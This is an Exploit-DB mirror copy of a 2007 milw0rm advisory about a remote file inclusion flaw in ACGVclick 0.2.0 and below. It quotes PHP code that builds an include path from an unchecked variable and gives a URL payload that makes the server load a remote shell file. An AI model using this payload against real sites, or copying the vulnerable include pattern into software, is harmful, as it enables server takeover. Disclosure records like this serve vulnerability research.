exploit-db-mirror/exploits/php/webapps/3206.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

41 lines
No EOL
725 B
Text

*******************************************************************************
# Title : ACGVclick <= 0.2.0 (path) Remote File Include Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://acgv.free.fr
# $$ : Free
*******************************************************************************
[[ERROR]]]
..
...
.....
<?
include($path."mysql.php");
include($path."aclick_connect.php");
$raf= new mysql_connection($hote,$login,$pass,$base);
?>
..
...
.....
[[ERROR]]]
[[RFI]]]
http://[target]/[path]//function.inc.php?path=[SHELL]
Example:
//function.inc.php?path=http://[target]/[path]/shell.x
[[/RFI]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-27]